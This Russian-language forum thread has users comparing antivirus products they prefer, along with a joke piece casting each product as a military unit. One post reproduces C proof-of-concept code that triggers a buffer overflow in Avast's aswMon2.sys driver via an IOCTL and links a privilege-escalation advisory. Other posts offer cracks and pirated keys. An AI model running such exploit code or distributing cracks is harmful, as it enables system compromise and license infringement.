Просмотр полной версии : Какой Антивирус Вы предпочитаете?
xaker-boss
13.01.2009, 01:00
Несколько лет на каспере сижу, и не жалуюсь..
Раньше сидел на avast но после того как ни один антивирус не мог обнаружить(кроме DrWeb) Win32/Sality, перешол на DrWeb. Очень хорош как сканер и мониторинг.... Советую.
ЗЫ. Недавно чистил им порядка 5 компов и пока всё отлично, справляется со своими задачами.
http://www.anti-malware.ru/self_protection_2009
StopFreeLife
17.01.2009, 14:30
конечно каспер любимая скотина)) некогда не подводил :)
Nod 32Eset Smart Security 3.0.672 rus
McAfee ) ибо другие антивиры палят то чего нету! особенно каспер....
Стоял касперский,жрёт слишком много оперативы...
Поставил себе связку Nod 32+Comodo
Обнаружил у себя стока троев,очень удивился....
Так что лучше юзать связку....
Avira Premium, нашла 58 троев после каспера
Sinister
30.01.2009, 09:15
стоял нод-снес, поставил каспера нашел 100 вирей. обои были с последними базами...
стоял нод-снес, поставил каспера нашел 100 вирей. обои были с последними базами...
чтото както не верится
Dr.Web 4.44
Устраивает во всем. Ежечасное обновление.
Проверка почты налету по средствам Spider Mail.
Доволен вполне.
rid3r~man
16.02.2009, 21:06
стареньии каспер....вирей куча, комп гудит (:
в чем проблема это изменить?
demo_version
19.02.2009, 14:23
Удалила аваст!!!!сидела с вирусами =\ не находил их нигде, на флешках было много =\
Теперь пробная Касперского, не знаю не знаю. . . .Вроде ловит что-то, но нет окончательного доверия.
Жизнь заставила, пользуюсь Avira вроде находит что-то!
Немного шутливый экскурс в сравнительные характеристики))
Avira
Метео-батальон.Если в военное время идёт ливень,град или снег,то гидрометеоцентр рекомендует запастись зонтиками,чтобы не замочило.
Батальон постоянно прочёсывает просторы в поисках замаскированных ферм в которых шпионы маскируются под крестьян.При обнаружении дует в свисток и выдаёт красную карточку.При ликвидации ферм остаётся свалка мусора.Надо искать дворников для наведения порядка.
Преимущества: лучшее средство от непогоды и не прошенных крестьян.
Недостатки: при прохождении очередного циклона,главное верить,что зонтик не сломается.Хотя,в медпункте хранится вещь,которая может спасти в трудную минуту.Антивирусы на войне
Касперский
Пехотный батальон. Становится лагерем вокруг компьютера, роет окопы и противотанковые рвы, минирует все к чертовой матери, обматывает колючей проволокой в сорок рядов, распределяет сектора обстрела орудий и пулеметов. Получившуюся оборону можно прорвать лишь при пятикратном (как минимум) численном превосходстве и только после многочасовых бомбардировок.
Преимущества: Враг сможет пройти лишь одним способом - превратив компьютер в выжженую пустыню.
Недостатки: Солдат надо кормить, а минные поля и окопы затрудняют перемещение гражданских, так что от ресурсов системы не остается почти ничего.
AVG
Батальон фольксштурма. Вооружен до зубов, но пользоваться оружием не умеет совершенно, периодически стреляя по своим и накрывая артиллерией совсем не те квадраты, отчего очень часто страдают гражданские. При появлении противника на горизонте начинает судорожно разворачиваться в боевой порядок и пытается рыть окопы прямо под пулями, так как совершенно не позаботился о заблаговременной организации обороны. В итоге ничего сделать не успевает, плюет на все и лупит по наползающим танкам из винтовок - разумеется, без особого толку.
Преимущества: Фольксштурмовцы обходятся подножным кормом, так что ресурсы системы практически не страдают.
Недостатки: Беспорядочная пальба по своим и по гражданским, высокая вероятность сдать позиции за считанные минуты при появлении реального противника.
Avast
Артиллерийская батарея. Эффективна против лобовой атаки - врага, наступающего на нее с фронта, способна перемолоть практически в любых количествах, почти без потерь для себя. Однако для ударов c фланга и, тем более, против заброшенных в тыл диверсантов, весьма уязвима. Разумеется, после того, как орудия будут развернуты в нужном направлении, перемалываются и диверсанты, но на это требуется время.
Преимущества: Артиллеристы кормят себя сами. Не спрашивайте, как - не знаю. Но система остается почти незатронутой.
Недостатки: Низкая оперативность.
Panda
Женский батальон, составленный из институток, вооруженных старенькими винтовками. При малейшем шорохе начинают истошно визжать и палить наугад (обычно - в небо). При виде противника падают в обморок или разбегаются.
Преимущества: Практически не заметен.
Недостатки: Полезный эффект тоже не заметен.
NOD32
Кавалерийский эскадрон. Оборону держать не обучен вовсе, при виде врага тут же бросается на него в атаку. Пытается взять нахрапом, обычно - психической атакой с шашками наголо. Если это не удается с первого раза, рассеивается по оврагам, уходит в партизаны и ждет подходящего момента чтобы повторить процедуру.
Преимущества: Лучшая оборона - это нападение, так что подобная тактика срабатывает всегда, пусть и не с первого раза.
Недостатки: Иногда приходится ждать очень долго. У местных красоток уже рождаются первые детки, похожие на солдат неприятеля, а эскадрон все еще партизанит по лесам и пускает под откос вражеские поезда с женскими подвязками.
McAfee
Танковая бригада. Рычат моторы, пахнет смазкой, чумазые танкисты хватают пробегающих мимо девушек за округлые места, и где-то за лесом идет пальба. Выглядит внушительно и весомо, в бою работает быстро, эффективно и безжалостно. Враг внутрь проникнуть не может хотя бы просто от страха.
Преимущества: Надежность.
Недостатки: Танковая смазка нынче очень дорога, не говоря уже о снарядах и горючем.Иногда забывают за врагов, если вокруг сильно много девушек.
Norton
Вражеская оккупационная армия. Офицеры на правах победителей бесплатно пьют шнапс в роскошных ресторанах, солдаты бегают по дворам, реквизируют съестное, лапают женщин и занимаются мелким бытовым мародерством. Другой-то враг в страну, конечно, уже не пролезет, это да. Но и жизнь в условиях оккупации, знаете ли, тоже не сахар.
Преимущества: Граница на замке. Намертво.
Недостатки: Враг уже внутри.
Dr. Web
Батальон карателей. Окружает компьютер двойным оцеплением, устанавливает военное положение, круглосуточное патрулирование, комендантский час и расстрел на месте за малейшую провинность. Каратели хватаются за оружие по любому поводу, и даже если повода нет, просто жестоко избивают прикладами и коваными сапогами всех, кто покажется им подозрительным, даже если это сам хозяин. Если ходить с поднятыми руками, медленным шагом и повесить на грудь пропуск, есть шанс, что бить будут не сильно и не очень долго.
Преимущества: Враг не пройдет.
Недостатки: Гости и хозяева тоже.
Trend Micro OfficeScan
Батальон наемников-профессионалов. Работают быстро, четко и стопроцентно эффективно, но только за деньги. Не слушают никого, кроме своего центрального офиса. Готовы сжечь даже детский сад или ясли вместе со всеми обитателями, если из центрального офиса сообщат, что это - вражеский опорный пункт.
Преимущества: Nothing personal, just business.
Недостатки: Денег нет? Контракт закрыт, все вопросы к менеджеру.
ClamAV на UNIX-сервере
База инопланетян, осуществляющая входной контроль. Иммунны к земным болезням, неуязвимы к земному оружию. Не очень хорошо разбираются в лицах и форме землян, в сомнительных случаях пропускают.
Преимущества: ресурсы системы не тратятся, вернее, тратятся на сервере.
Недостатки: иногда пропускают врагов.
AVZ
Профессионал-одиночка, настоящий комиссар с революционным чутьём. Десантируется с флешки, уничтожает наступающие войска напалмом, вычисляет шпионов пятой колонны в тылу, на ходу проводя фейс-контроль всем солдатам командирам союзников. Быстренько чинит повреждения, нанесённые вредителями, даёт кучу советов по повышению революционной бдительности - и без следа уходит в красный закат.
Преимущества: Готов вступить в бой без всяких подготовок и рытья окопов. Обвешан кучей оружия, которое может пригодиться и для мирных целей. Работает исключительно за идею и очень, очень быстро.
Недостатки: Одиночка, со всеми вытекающими.
http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif
http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif http://forum.zloy.org/images/icons/NYsmile.gif
Grinya11
22.02.2009, 21:20
нод32 самый кал что только можно установить во вселенной! кейлогер даже не спалил хоть АВГ сразу зажопил
дома Avast! использую, на работе NOD32.
У меня был Касперский, но он не ловит всех вирусов и я установил Nod 32 )))
и правильно сделал nod 32 рулит
не давно установил bitdefender total security 2009, после маккафи, касперя, нода. Bitdefender более отвечает своей цели. После некотрых манипуляций над настройками просто шик. Темный антивирус с файерволом и многим другим. Советую!
надо посмотреть что за зверь
kakoy_nafig_nik
19.03.2009, 22:30
Каспер. Только он спалил однажды у меня руткит. После этого я еще раз убедился, какой из антивирусов лучший. Ради него даже снес на недомашней машине нод32 с бесплатным зеркалом обновлений в локалке.
X-RayBlade
20.03.2009, 10:48
Каспер - более или меннее стабильное, из того что приходилось использовать
GrandPa92
20.03.2009, 13:48
У меня веб 4.44 ставил веб 5.0 но он че то не обновлялся и вернул на 4.44.
-=$MiRoN$=-
15.04.2009, 10:20
Фаервол 2009! Класный
spider-intruder
15.04.2009, 10:28
Это что такое "фаервол 2009" ??? Кто производитель?!
ПС: археолог!
AntiAmerican
15.04.2009, 23:06
Раньше были NOD32 и Dr.Web, все поначалу казались классными, но потом столько вирусов по-напускали, что Боже упаси!!!!!
Теперь стоит Каспер. Предыдущие версии - отстой, однако 2009 версия , скажем так, на высоте.! ИМХО
Порадовало быстродействие и скан
_S.H.U.R.A.K.E.N_
16.04.2009, 20:36
Kaspersky Anti-Virus-неплохой.
NOD 32-остання версія не погана
Это что такое "фаервол 2009" ??? Кто производитель?!
ПС: археолог!
это нечто вроде Antivirus 2009 ;)
Only Ативирус Касперского 8
B.l.a.c.k
25.04.2009, 02:35
NOD32 всем советую!
вот у меня на днях была 1 ситуаци,юзал Др.Веб просканил комп,все вирусы залечил,если не личись удалял,потом поставил Нод32,просканил комп нашел 3 вируса,потом поставил Аваст он же нашел 6 вирусов Оо
пздц кароче xD
Руки.dll + Мозг.exe
А так - проверяю KIS'ом всю систему 1 раз в месяц.
Nod32 v4 +outpost firewall pro 2009... C помощю этой связки за 2 года ни 1 вируса(главное за оутпостом следить что куда лезет)
_-G.O.L.D.-_
11.05.2009, 23:40
Nod32 Он прост и удобен.
B.l.a.c.k
12.05.2009, 04:24
Уже выйшов Nod 32 4 версия! Я себе поставил, вроди нормально робет!
-S.a.n.y.a-
17.05.2009, 12:55
Став Nod 32
Всегда стоял нод32, сначала 2 версия, потом третья с фаер волом(Smart Security) очень удобный, одним нажатием блокируешь соединения или валишь мелкие трояны, правда чтобы он все находил приходилось выставлять отображение всех скрытых и защищенных системой файлов . Все было хорошо, но тут в мою жизнь пришел вирус Sector 17 или sality...Этот вирус косячит проги. В первую очередь он расправился с антивирусом, вроде нод и работает, а вроде и нет, ядро программы было поврежденно, я мог только наблюдать какие вирус пожирает екзешники. Вырвал винт, почистил у друга KIS'ом, он вылечил все, правда настройки системы полетели. Доверие к ноду пропало. Ищу новый антивирус. Каспер неплохой антивирус, но почему то у меня к нему отвращение, как и к авасту, панде, нортону и тд. хочу поставить доктора веба, но ключиков к нему не могу найти, может кто кинет в ЛС ссылочку на рабочие ключики для др веба, желательно на пятую версию
KIS уже 3 года.
n0 problems
McAfee = антивирус+фаервол+визуал трейсер = прост в настройке, легок в работе, приятен на глаз!!!
mizer911
30.05.2009, 16:18
предпочитаю drweb уже много лет!!! кому надо:
Бесплатный журныльный ключик для Drweb security space&антивирус Drweb до 20.10.2009,
обновляется без проблем! и не нарушает законодательство! http://is.gd/GpPr
Guron_18
24.07.2009, 08:19
Аваст > отстой. Пол года сидел(лет так 3 назад)
Каспер > отличный, но с ключами полная *опа
Nod32 > хороший (сейчас сижу) находит ОЧЕНЬ мало((
Dr.Web > конкретно утилита Cureilt просто супер, сам антивирь по судьбе не могу установить... вечно что-то происходит, винда слетает, винт роняется разбивается и т.д.
bitdefinder > фигня, но удобный. Ставил когда комп только купил. Каспер видит его как троян даунлоадер ^_^
AVZ чего-то вообще ничего не находит))
L0TAR1ON
24.07.2009, 23:52
Ну Касперский думаю самый лучшый,но для мощных машын,а средный то Аваст или Нод.У мну лично аваст стоит,все хорошо и на себя памяти немного жрёт,совутую.
Если что могу дать кряк на 1500 дней :) За + к репе)
Ну Касперский думаю самый лучшый,но для мощных машын,а средный то Аваст или Нод.У мну лично аваст стоит,все хорошо и на себя памяти немного жрёт,совутую.
Если что могу дать кряк на 1500 дней :) За + к репе)
О..далеко пойдешь..далеко)
InDuStRieS
27.07.2009, 16:31
outpost firewall pro 2009 +касперский
AVG (Free редакция), пинчи, трояны, подозрительные файлы, все палит, независимо, запущен ли антивирус, монитор всегда висит в процессах, и блокирует исполняемые файлы, пока они не проходят проверки. (т.е. непосредственно к их обращению, в том случае даже когда к ним обращаются другие процессы) Не одну заразу не пропустил мимо себя. Забыл, что такое переустановка ОС, с касперским приходилось переустанавливать периодически, т.к. он умудрялся пропускать вирусы в систему (до этого пользовался им), но теперь понимаю что это то еще УГ (да простят меня поклонники этого продукта)
Tankist666
29.07.2009, 00:27
Symantec AntiVirus Client-неплохой.Если кто желает поюзать-могу скинуть инсталл
Ant1b10t1k
29.07.2009, 00:31
Avast+sunbelt personal Firewall все устраивает.
Tankist666
29.07.2009, 00:41
Как по мне,так нет в мире идеального антивира.Много перепробовал-во всех есть недостатки.Но,в споре рождается истина.Давайте продолжим тему...
outpost firewall pro 2009 +касперский
А я фаерволы перестал использовать как начались проблемы со спутниковым интернетом :(
неюзаю антивири я в них неверю :)
Tankist666
29.07.2009, 00:58
EP']неюзаю антивири я в них неверю :)
А как от вирусов оборону держишь?
EP']неюзаю антивири я в них неверю :)
По твоей аватарке я все понял уже..
А как от вирусов оборону держишь?
а никак) у ми на компе ничё ценного нету толком...да и серьёзные вири ко мне ищё не заходили) так черви) а в них одни плюсы - никто не просит Запиши то запиши сё)) гг
По твоей аватарке я все понял уже..
и что же ты понял?
Tankist666
29.07.2009, 01:13
EP']а никак) у ми на компе ничё ценного нету толком...да и серьёзные вири ко мне ищё не заходили) так черви) а в них одни плюсы - никто не просит Запиши то запиши сё)) гг
Ну тоже вариант.У меня был Norton,так он все кряки и кейгены считал за вирусы.Если часто ими пользуешья-все мозги вы**бет своими сообщениями!!!
Ну тоже вариант.У меня был Norton,так он все кряки и кейгены считал за вирусы.Если часто ими пользуешья-все мозги вы**бет своими сообщениями!!!
вово) а нод ппц вообще......
Tankist666
29.07.2009, 01:28
EP']вово) а нод ппц вообще......
Ну яего не юзал-не знаю.А вообще-все антивиры-говно полное т.к. ни один не гарантирует 100% зашиту.Но говно это нужное,особенно если на нете сидеть.
drummashins
29.07.2009, 01:31
стоит symantec
хз, я лично юзаю каспера 7, все подозрительное через виртуалку пускаю
Tankist666
29.07.2009, 01:33
стоит symantec
Ну и как он тебе?
Tankist666
29.07.2009, 01:40
хз, я лично юзаю каспера 7, все подозрительное через виртуалку пускаю
Был у меня недавно.Я ради прикола его снёс,поставил symantec-он 3 вируса нашёл.А с другой стороны-каспер находит вирусы,не найденные symantec.
Был у меня недавно.Я ради прикола его снёс,поставил symantec-он 3 вируса нашёл.А с другой стороны-каспер находит вирусы,не найденные symantec.
а с 3 стороны у каспера есть проактивка, которая срабатывает при запуске. Я специально ставил опыты с авирой и каспером. Авира палила крипт, каспер молчал. Но если запускать, то каспер тоже палил сразу. А если хитровыебанный был крипт,авира с каспером вместе молчали, но при запуске опять срабатывала проактивка и палила отсылку
Tankist666
29.07.2009, 02:05
а с 3 стороны у каспера есть проактивка, которая срабатывает при запуске. Я специально ставил опыты с авирой и каспером. Авира палила крипт, каспер молчал. Но если запускать, то каспер тоже палил сразу. А если хитровыебанный был крипт,авира с каспером вместе молчали, но при запуске опять срабатывала проактивка и палила отсылку
Это огромный плюс каспера.Жаль,но идеальных антивиров нет и не будет.А ты не пробовал Avira AntiVir Premium Security Suite 8.2.0.45 или Agnitum Outpost Security Suite Pro2008 v6.0.2225?Уж больно хорошие о них отзывы в нете.Хотелось бы услышать твоё мнение,если юзал.
Юзаю avast и dr web.Dr web как сканер.)Юзаю аваст потомушто он бесплатен , а ставить нод 32 и потом типа крякать его-тупость!!!!Ввод левых ключей в антивирь ето всего картинка , а функцыи прежние что и при демо)А доктор веб потомушто с некоторыми файлами аваст не может справитса, др веб всё отлично лечит ну а что не вылечивает- удаляет)).
Stinside
13.08.2009, 01:10
Да я как бы уже 2 года на avaste. :)
BitDefender Antivirus -
юзаю уже больше года: лучше не видел.
mishanya91
13.08.2009, 12:29
пользуюсь AVG. уже лет 5. Проблем не было. Работает тихо.
Пользуюсь авастом и всё норм
mercenare
13.08.2009, 16:27
В данный момент юзаю DrWeb
Prokuror
13.08.2009, 18:24
Однозначно считаю Каспера лучшим антивирусом, а заодно и патриотичным:) Из минусов можно отметить загруженность системы на порядок выше чем у других антивирусов, а так же плохую совместимость с другими средствами защиты.
Явно Avast.По другому не как=)Ибо ловит много гадости и почти не грузит систему=)
Dark_WarLord
20.08.2009, 11:58
Avira Premium Security Suite v 9 - очень доволен!! Ключики можно каждые 3 месяца самому регать, обновляется шустро, базы у него не большие - даж используя телефон как модем можно обновляться и не "попасть на бабки"...
Вот уже года 3 не знаю проблем с вируснёй..
Avast.Аваст потомучто бесплатно!!!Я не вижу смысла ставить нод 32.Лицензионый нод класный антивирус но триал версия фуфло)Когда вы вводите типа вечный ключ или чтото в етом роде то меняетса лиш картинка, а возможности програми остаютса теже что и при триал версии.
GRobbeRZ
01.09.2009, 14:02
Avast.Аваст потомучто бесплатно!!!Я не вижу смысла ставить нод 32.Лицензионый нод класный антивирус но триал версия фуфло)Когда вы вводите типа вечный ключ или чтото в етом роде то меняетса лиш картинка, а возможности програми остаютса теже что и при триал версии.
Нечо незнаю у меня стоит ESET Nod32 Antivirus 4.0.417.0 и ключи я постояно меняю(беру с китайских сайтов) и все нещтяк. А если ещо Outpost поставить(он у меня стоит) то вобще все круто неодин вирь или трой на комп непролезет :)
самый лудчий антивирус это linux+vmware
Юзаю Касперский + Norton.
А и все равно не сильно помогают. Для красоты стоят.
heretic1990
02.09.2009, 15:36
меня avast! устраивает!
ESET нод 32+ стенка от Аутпоста про 2009+AVZ от каспера :D
shur1d0ZeR
03.09.2009, 22:09
Касперский меня всем устраивает =)
Сам пользуюсь Norton, вроде все устраивает. А по тестам смотрел, на первом месте ESET вообще :)
port_xxx
04.09.2009, 19:21
DR.WEB!!! По моему мнению самый лучший!!!
Каспер+Доктор вэб. Каспер - постоянно мониторит систему, а Вэб только выборочно....
Хотя и с Касперским ни каких проблем нет.
Spider Agent
15.09.2009, 04:46
Outpost Security Suite. доволен целиком и полностью
AVP(Kaspersky Anti-Virus)
inspektor
18.09.2009, 18:40
конечно NOD 32
Для настаящего хакеРА антивирь не нужен так как хакеры предпочитают Linux,так как вирей для линукса не много!
А вообще используйте АВАСТ!!!
inspektor
24.09.2009, 14:01
NOD32 лцчще нету!!!!!!!!!!!!!
Comodo Internet Security и хоть ты тресни, останавливает всё на ура
Government
24.09.2009, 21:01
У меня сложилось впечатление что думать головой в этом топике не хотят, все тупо бодаются над извечной темой.
О качестве любого продукта можно судить о его бюджете т.е. если у Касперского бюджет самый большой из перечисленных антивирусов то соответственно он и лучше.
Вот рассматривать вариант КАВ+ Оутпост конечно стоит ибо у Оутпоста бюджет побольше вот и все.
п.с. Пример Мерседес и Бентли или Бентли + тюнинг мерседес хорошая конечно машина но бинтли значительно лучше
Serega-777
26.09.2009, 15:34
Eset рулит... вирусы ловит на ура
avast :)
раньше сидел на ноде
s0l_ir0n
28.09.2009, 07:28
Буффер оверфло в авасте:
Avast-aswMon2-expl.c
24 сентября, 2009
#define WIN32_LEAN_AND_MEAN
#include < windows.h>
#include < stdio.h>
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH]; HANDLE hDevice;
if ((GetVersion() & 0xFF) >= 5) {
wcscpy(DeviceName, L"\\\\.\\Global\\");
} else {
wcscpy(DeviceName, L"\\\\.\\"); }
wcscat(DeviceName, DriverName); printf("Opening.. %S\n", DeviceName);
hDevice = CreateFileW(DeviceName, GENERIC_READ |
GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("CreateFile() ERROR %d\n", GetLastError()); return FALSE;
}
*lphDevice = hDevice; return TRUE;
}
int main() {
HANDLE hDev = NULL; DWORD Junk;
if(!OpenDevice(L"aswMon",&hDev)) {
printf("Unable to access aswMon"); return(0);
}
char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (Buff)
{
memset(Buff, 'A', 0x288);
DeviceIoControl(hDev,0xB2C80018,Buff, 0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL);
printf("DeviceIoControl Executed..\n");
}
else { printf("VirtualAlloc() ERROR %d\n", GetLastError()); }
return(0); }
https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Loc al_Privilege_Escalation.php
EtoNevashaPROveRKA
28.09.2009, 09:28
Буффер оверфло в авасте:
https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Loc al_Privilege_Escalation.php
а мне авира очень нравиться очень...уважаю....
Доктор Вэб всем советую...
Хороший,наждежный!Некогда неподводил еще=)
AVAST profesional пользовался и каспером и Nod-ом но они пропускают многие вирусы и закинуть червя не состовлят труда через них
Sabir_DAG
28.09.2009, 13:41
На мой взгляд, абсолютно лучшего антивируса, нет.. у всех есть свои недостатки... Мне больше всего нравится Др. Веб.. по моему, он наиболее надежный, хотя..... А в данный момент, пользуюсь Нод32, с треалом на 10 лет.. вроди пока норм...:)
mercenare
28.09.2009, 16:42
Мне KIS нравиться))) По моему он один из лучших)
FelixKoT
28.09.2009, 17:02
Пользуюсь KIS 9,проблем не наблюдалось.
Да и машина позволяет.
Daiver1989
28.09.2009, 17:47
avast!
Бесплатно зарегился пол года тому назад дали ключик с тех пор не одного сбоя вирусов не наблюдалось.
Alka[ID]
29.09.2009, 07:52
Раньше использовал касперский, но после очередного обновления столкнулся с проблеммой поиска ключей.
Поэтому перешел на Avast и остался доволен. Работает быстро, не напрягает систему, качественно находит всякую заразу, и главное бесплатный.
Dr.Web гасит все антивири ниже себя по списку + NOD32 гасится под ним ;)
Плюсы - использование бесплатных ключей круглый год, базы нифига не весят...
Отлично защищает, параллельно с отпостом. И только по этому стоит пользоваться именно им!
Минусов вроде не обнаружено, защита превосходная.
вообще временами включаю каспера, но все равно от него толку мало, поэтому в основном руки+фаер (outpost), ну и он лайн проверка подозрительных файлов.
на арче вообще ничего не стоит
В данный момент стоит кис 2009 + аутпост. Немного настроек, чтобы не ругались друг на друга и все отлично = )
mercenare
01.10.2009, 20:36
А стоит ли купить лицуху KIS?
Стоит Касперский...не раз спасал =)
mistermar
11.10.2009, 15:58
KIS cтоит пробелы не наблюдались..
Killerkod
12.10.2009, 09:44
Нод рулит!!! Особенно в связке с оутпостом 2009
Ну или на крайняк аваст, а каспер сильно грузит систему, хотя если у вас 4-х ядырный проц и все остальное тоже на уровне, то можно и взять,..
Стоял NOD щяс поставил Касперского ничего вроде...)
В данный момент стоит кис 2009 + аутпост. Немного настроек, чтобы не ругались друг на друга и все отлично = )
уже лучше тогда kav 9 + аутпаст,так намного лучше.
сам пользуюсь кис 9,перепробовал практически все антивирусы,но все таки остановился на каспере.
уже лучше тогда kav 9 + аутпаст,так намного лучше.
сам пользуюсь кис 9,перепробовал практически все антивирусы,но все таки остановился на каспере.
не совсем понял зачем к кис аутпуст :confused: а сетевой экран зачем :confused: сам пользуюсь KIS 2010 недавно поставил, очень доволен, лицензию покупал на kaspersky-shop.ru за 60% от стоимости.
не совсем понял зачем к кис аутпуст :confused: а сетевой экран зачем :confused: сам пользуюсь KIS 2010
читай внимательно,я писал к KAV аутпаст нужен.
а у меня у самого просто стоит на компе KIS 9
Нод-фаер со связкой Spyware Doctor с антивирусом - никто не пролез
Нод-фаер со связкой Spyware Doctor с антивирусом - никто не пролез
у нода слабый фаервол
Untouchable
23.10.2009, 22:46
Уже года полтора юзаю седьмой Каспер. По мне так очень даже шустрый.
39 страниц и все пишут о том что используют... :rolleyes:
сабж: linux
iron-viper
25.10.2009, 01:21
купил уже как месяца полтора лицензию капсера
Agent_Smit
29.10.2009, 18:43
я юзаю Eset Smart Security 4 і зовсім задоволений
покишо жодного разу не підводив при скануванні і знищенні вірусів
юзал Nod32, потом не помню из-за чего его стёр, и ничем не пользуюсь, разве что ток онлайн сканеры и Dr.Web CurelIT!
http://antivirus.ru/AntiVirPS910.html
Тестирование антивирусов....
До сегодняшнего дня стоял оутпост + нод 32 ,, но сегодня достало , что нодовский процес ekrn.exe сильно грузит систему , ещё и трафик отбирает ( .. Сейчай озадачек что выбрать... Вариант отключения постоянного мониторинга файлов в ноде меня не особо привлекает :(
Много антивирусов перерпробовал, больше всего KIS 2009 устраивает. Самый надёжный. ИМХО
sTe[A]LeR
20.11.2009, 23:13
Самые надежные - NOD и Avira IMHO, у меня стоит Avira . . .
rotvellerr
26.11.2009, 16:02
Dr.Web Security Space
Юзал касперского потом NOD потом доктора веба, но всё же остановлся на каспере...просто никогда не подводил меня вот и выбрал его:)
Лично я использую аваст! Вирусы ловит лучше чем НОД. Проверенно на собственном опыте. А вот ссылка на рейтинг антивирусов. http://www.antivirus.ru/AntiVirPS.html
denis333
27.11.2009, 22:23
Я тоже авастом пользуюсь. А вообще нет наверное лучшего антивиря, у всех есть и плюсы и минусы.
Nod32..в локале обновляюсь там ключи ненадо..систему не глючит..сидит тихо..с Outpost'om ладит..больше нечего ненадо для счастья:)
denis333
03.12.2009, 21:55
А можно на комп ставить несколько антивирей? Сейчас у меня аваст
Jason Bourne
05.12.2009, 00:20
Поставить можно, но будут грызться...
Если к авасту каспера поставите, то в сетку выйдите наврятли :)
комп плакать будет
сам проверял)))
cheater_man
06.12.2009, 17:59
Че......... Нод32 нормальный антивирь? хахахаха.....
Нод32 ваще слепой нифига ни чего не видит!
Если у жертвы стоит нод, то нам хаккерам только + :D
Правильно говорю? :D
Flower24
07.12.2009, 02:59
У меня уже как 8 лет стоит Avira Premium, работает и защищает на славу!
Jason Bourne
07.12.2009, 20:10
Avira тот же самый Avast только с другой мордой :) ровно как и McAfee к то муже последний в настройке веселый очень :)
ichechen
07.12.2009, 20:19
Для меня касперский лучший, но из - за того что он слишком ресурсоемкий я никогда им не пользуюсь, обычно пользуюсь nod32 - ведет себя тихо и защита не плохая, щас стоит AVG - только из-за того, что он легче других работает, хотя толку мало))
cheater_man
09.12.2009, 13:41
Avira тот же самый Avast только с другой мордой :) ровно как и McAfee к то муже последний в настройке веселый очень :)
Нет, я не солгсен Avast и avira разрабатывает разные компании. Да может и есть что-то общего, но совсем немного
[Dead]Demon
16.12.2009, 09:41
AVP(Kaspersky Anti-Virus)
NOD 32 v4.xx - лучче некуда.......Ни продлем с вирусами ни с ключами.....работает отлично...просто превосходно
Пользую Каспер и Авиру.Работают в паре отлично,систему не грузят,при том,что машина не особо мощная.Плюс то,что не видит Каспер,видит Авира,спасибо эвристике.В общем,пара убойная получается.
Использую Касперского, иногда обновляю, заодно CureIT юзаю.
Votarknap
27.12.2009, 19:16
Использую
NOD 32 v4.xx
[extas-y]
01.01.2010, 21:43
Outpost Firewall
касперский лучший, но он грузит машину очень,но тое временами не надёжный..
kiper_light
03.01.2010, 08:21
перешел на Dr.Web Security Space 5.0 + аутпост - проблем вроде пока не было)
+ периодическая проверка CureIt, AVZ и hijackthis
Extr1mal
03.01.2010, 10:16
Я юзаю Аваст
Незнаю я многое перепроб.((avast! ,Norton ,Panda ,DrWeb ,NOD32 ,Kaspersky ,)) и пришёл к выводу что еслиб можно поставить их все,то проблем бы не было.А так все вроде не чего со своими замашками..НО сейчас на -Kaspersky ...
какие ище есть антивирусы, кроме тех что в опросе ?
Да это лучшие..а там тебе выбирать.
По мне так Kaspersky! Пробовал АVAST что то не очень то он и находил вирусы...
Jason Bourne
04.01.2010, 12:13
По мне так Kaspersky! Пробовал АVAST что то не очень то он и находил вирусы...
Родственная душа :D
по моему мнению самий надежний ето nod32,так как месяц назад стоял касперский,я ево удалил,и поставил нод,так он 3 вируса нашел...пока с нод32 все норм. )
-Unlocked-
05.01.2010, 21:10
М, авастик.
Мой ответ:NOD32.
Был до этого Аваст,но не оправдал доверие много чего пропускал!
Кстати говорят хорошая связка нод 32 и бесплатная Авира?!
пробовал почти все, остановился на Avira AntiVir Premium Security Suite 2 в 1 + фаер, имхо руль!
исключительно Avast! ровно год.После того как Нод пропустил гадость в комп,после это же сделал Каспер(возможно и по моей вине,но не факт) Аваст! не подводил в течении года,все вовремя детектировал в том числе и в сети(не одного заражения(сколько не пытался чеНить подхватить на порно сайтах :D )) + легкость,высокая скорость и бесплатность! Лучшее решения для нетбуков/ноутбуков , у меня ровно год стоял на станционарнике,теперь на моб устройствах! :)
[']пробовал почти все, остановился на Avira AntiVir Premium Security Suite 2 в 1 + фаер, имхо руль!
соглашусь! AVIRA хороша(личный неоднократный длительный опыт)
стоит каспер 10ый, но иногда cureit'ом прогоняю когда чую неладное :)
тут (http://www.admin-club.net/index/0-13) не плохая статейка о извесных антивирусай.... тестирование, выводы.....короч интересно. (правда староватая наверно)
Конечно большинство из вас юзает разные антивири и эти выборы связаны с многими факторами и раздумьями.. Как говорится сколько людей столько и мнений...
Я же лично не представляю своё личное мнение а говорю самый надёжный, и самое главное проверенный вариант защиты компа для среднего пользователя - это связка avira premium + outpost firewall.. Сейчас скажу лишь несколько проверенных фактов (если кто то считает имеенно эти факты ложью может проверить их сам) - авира обладает более лучшей базой сигнатур вирусов чем KIS (проверено на папке "5992 вируса", следовательно лучше защитит комп от уже попавших вирусов), авира не нагружает систему (если вы юзали КИС\КАВ то поймёте о чём я), авира создана немцами для надёжной защиты ПК и она лучше всего это делает. Ну а то что оутпост является лучшим фаерволом врятли ктото поспорит)) Всем рекомендую данную связочку!!!
G-Data Total Care 2010 - предпочитаю
http://ru.wikipedia.org/wiki/G-DATA
vlad_tsepesh
20.01.2010, 22:37
